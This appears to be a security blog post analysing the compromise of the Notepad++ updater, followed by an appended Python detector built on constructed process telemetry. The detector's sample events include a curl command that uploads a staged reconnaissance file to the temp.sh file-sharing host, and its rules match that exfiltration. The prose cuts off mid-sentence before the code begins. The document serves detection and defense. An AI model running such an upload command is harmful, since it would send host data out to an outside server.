What happened in the Notepad++ compromise

On February 2nd, 2026, Don Ho, developer of the free source-code editor Notepad++, published a security disclosure stating that the update infrastructure behind Notepad++ had been compromised. The disclosure notes that multiple research groups attribute the activity, with likely confidence, to a Chinese state-sponsored group. The Advanced Persistent Threat (APT) group behind it maintained access from June 2025 until December 2nd, 2025. Ho's disclosure goes on to detail the sophistication of the supply chain attack against the project's update mechanism.

In this campaign, state-sponsored attackers hijacked part of the legitimate distribution process. Rather than exploiting end users directly, the adversary abused the trusted relationship between Notepad++ and its update infrastructure, which allowed trojanized installers to be delivered to selectively targeted users. The impact is significant because Notepad++ is widely used by developers, system administrators, and security professionals. By weaponizing a trusted software update path, the attackers obtained initial access, reconnaissance, and persistence within victim environments and remained undetected for months. The compromise illustrates once again that software supply chains remain a high-value target for nation-state actors.

Notepad++ has a history of taking political stances as geopolitical events unfold. Prior releases have carried explicit political messages, including standing with Hong Kong as early as v7.8.9, supporting Taiwan's independence in v8.6.9, and more recently standing with Ukraine in v8.8.1. There is a certain irony in alleged Chinese APTs compromising Notepad++'s supply chain after multiple messages supporting Taiwan, Hong Kong, and Ukraine.
Technical analysis of the compromised update mechanism

The attack abused the WinGUP (GUP.exe) updater component of the Notepad++ update mechanism. Attackers distributed trojanized Notepad++ installers to targeted users, so the initial execution appeared legitimate and matched normal user behavior.

During the compromised update flow, the GUP.exe process was observed spawning an executable named AutoUpdater.exe. That behavior is anomalous: ordinarily WinGUP performs update checks and downloads through the libcurl library it links internally, and it does not launch external binaries or invoke curl.exe directly.

Once executed, AutoUpdater.exe carried out a series of host-based reconnaissance actions: enumerating active network connections, collecting endpoint and operating system details, listing running processes, and identifying the actively logged-in user(s). The collected information was aggregated and written to a local file named "a.txt". The malware then used curl.exe to exfiltrate the contents of "a.txt" to a remote endpoint hosted on the file-sharing service temp[.]sh.

The presence of a rogue curl.exe binary is a particularly strong indicator of malicious activity in this context, because it deviates from the expected behavior of the WinGUP updater and introduces a living-off-the-land style exfiltration technique. Note that curl.exe also ships with current Windows builds under System32, so the indicator is not curl itself but a curl.exe launched from an unexpected path or from under the updater's process tree.

Public reporting indicates that the campaign persisted for approximately six months, with the attackers maintaining control of the compromised update channel and selectively targeting victims. The long dwell time suggests careful operational security and a high degree of confidence in the stealth of the attack.
Detection opportunities for malicious update activity

- WinGUP (GUP.exe) invoking external curl binaries, directly or further down its process tree
- curl commands reaching out to temp[.]sh
- Creation of an a.txt file, or other one-letter .txt files, since that is how collected data was staged for exfiltration
- Instances of AutoUpdater.exe spawning from temporary directories

Mitigation strategies for supply chain attacks

- Implement a robust allowlisting solution
- Investigate unusual network activity from applications running in temporary directories
- Update installs of the affected Notepad++ versions (8.8.2 through 8.8.9) to 8.9.1
- Download updates manually from official sources rather than relying on built-in updaters

How organizations can defend against supply chain attacks

Supply chain compromises are especially dangerous because they abuse trusted software and legitimate update mechanisms. To defend against them, security teams need visibility into application behavior, strict execution controls, and continuous monitoring for deviations from normal update workflows. In this instance, a custom binary (AutoUpdater.exe) was spawned by a trusted updater. Implement application control strategies that prevent unauthorized binaries from executing, even when launched by a trusted parent process. Update mechanisms should also not be permitted to invoke extra tools, spawn additional executables, or communicate with unapproved domains withou
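The detection opportunities above, expressed as rules that run over process-creation and file-creation telemetry, as an added example that is not code from the original post, from Notepad++ or from WinGUP. It uses Sysmon-style field names (Image, ParentImage, CommandLine, TargetFilename, ProcessGuid) but the events embedded below are constructed for the example, as are the process identifiers and the curl upload command line; the post names temp[.]sh as the destination but not the exact URL. The detector also walks process ancestry so that a curl.exe launched by AutoUpdater.exe, which itself was launched by GUP.exe, is still attributed to the updater.

```python
import re

# Constructed Sysmon-style telemetry for this example; not real logs.
# EventID 1 = process creation, EventID 11 = file creation.
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "p-npp", "ParentProcessGuid": "p-explorer",
     "Image": r"C:\Program Files\Notepad++\notepad++.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "notepad++.exe"},
    {"EventID": 1, "ProcessGuid": "p-gup", "ParentProcessGuid": "p-npp",
     "Image": r"C:\Program Files\Notepad++\updater\GUP.exe",
     "ParentImage": r"C:\Program Files\Notepad++\notepad++.exe", "CommandLine": "GUP.exe"},
    {"EventID": 1, "ProcessGuid": "p-au", "ParentProcessGuid": "p-gup",
     "Image": r"C:\Users\alice\AppData\Local\Temp\AutoUpdater.exe",
     "ParentImage": r"C:\Program Files\Notepad++\updater\GUP.exe", "CommandLine": "AutoUpdater.exe"},
    {"EventID": 11, "ProcessGuid": "p-au",
     "Image": r"C:\Users\alice\AppData\Local\Temp\AutoUpdater.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Local\Temp\a.txt"},
    {"EventID": 1, "ProcessGuid": "p-curl", "ParentProcessGuid": "p-au",
     "Image": r"C:\Users\alice\AppData\Local\Temp\curl.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\AutoUpdater.exe",
     "CommandLine": "curl.exe -T a.txt https://temp.sh/"},  # made-up upload URL
    {"EventID": 1, "ProcessGuid": "p-curl2", "ParentProcessGuid": "p-cmd",  # benign
     "Image": r"C:\Windows\System32\curl.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe https://example.com/health"},
    {"EventID": 11, "ProcessGuid": "p-npp",  # benign
     "Image": r"C:\Program Files\Notepad++\notepad++.exe",
     "TargetFilename": r"C:\Users\alice\Documents\notes.txt"},
]

TEMP_DIR_RE = re.compile(r"\\(temp|tmp)\\", re.IGNORECASE)
ONE_LETTER_TXT_RE = re.compile(r"^[a-z]\.txt$", re.IGNORECASE)
EXFIL_DOMAIN = "temp.sh"  # file-sharing service named in the post


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_temp_dir(path):
    return bool(TEMP_DIR_RE.search(path))


class UpdateAbuseDetector:
    def __init__(self, expected_wingup_children=()):
        # ProcessGuid -> (image basename, ParentProcessGuid), used to walk ancestry
        self.procs = {}
        # Tuning knob (assumption): child images GUP.exe is allowed to spawn in
        # your environment. The post treats any spawned binary as anomalous.
        self.expected = {c.lower() for c in expected_wingup_children}

    def ancestors(self, guid):
        """Image basenames of every recorded process above `guid`, nearest first."""
        chain, parent = [], self.procs.get(guid, (None, None))[1]
        while parent in self.procs and len(chain) < 32:
            image, parent = self.procs[parent]
            chain.append(image)
        return chain

    def evaluate(self, ev):
        """Return the list of rule names the event matches (empty if benign)."""
        hits = []
        if ev["EventID"] == 1:
            image, parent = basename(ev["Image"]), basename(ev.get("ParentImage", ""))
            cmd = ev.get("CommandLine", "").lower()
            self.procs[ev["ProcessGuid"]] = (image, ev.get("ParentProcessGuid"))
            lineage = set(self.ancestors(ev["ProcessGuid"])) | {parent}
            if parent == "gup.exe" and image not in self.expected:
                hits.append("wingup_spawned_child")
            if image == "autoupdater.exe" and in_temp_dir(ev["Image"]):
                hits.append("autoupdater_from_temp_dir")
            if image == "curl.exe" and "gup.exe" in lineage:
                hits.append("curl_spawned_under_wingup")
            if (image == "curl.exe" or cmd.startswith("curl")) and EXFIL_DOMAIN in cmd:
                hits.append("curl_to_temp_sh")
        elif ev["EventID"] == 11:
            target = ev["TargetFilename"]
            # Scoped to temp paths (assumption) to keep one-letter .txt files from
            # ordinary user folders out of the alert stream.
            if ONE_LETTER_TXT_RE.match(basename(target)) and (
                in_temp_dir(target) or in_temp_dir(ev.get("Image", ""))
            ):
                hits.append("one_letter_txt_staging")
        return hits


def run_detections(events=SAMPLE_EVENTS):
    """Evaluate events in order; returns one list of rule hits per event."""
    det = UpdateAbuseDetector()
    return [det.evaluate(ev) for ev in events]


if __name__ == "__main__":
    for i, hits in enumerate(run_detections()):
        if hits:
            print(f"event {i}: {', '.join(hits)}")
```

Run against the constructed sample, the benign notepad++.exe launch, the legitimate GUP.exe check, the System32 curl to an unrelated host, and the notes.txt write produce no hits, while AutoUpdater.exe, a.txt and the curl upload each trip the corresponding rules. Events must be fed in chronological order, since ancestry is only known for processes already seen.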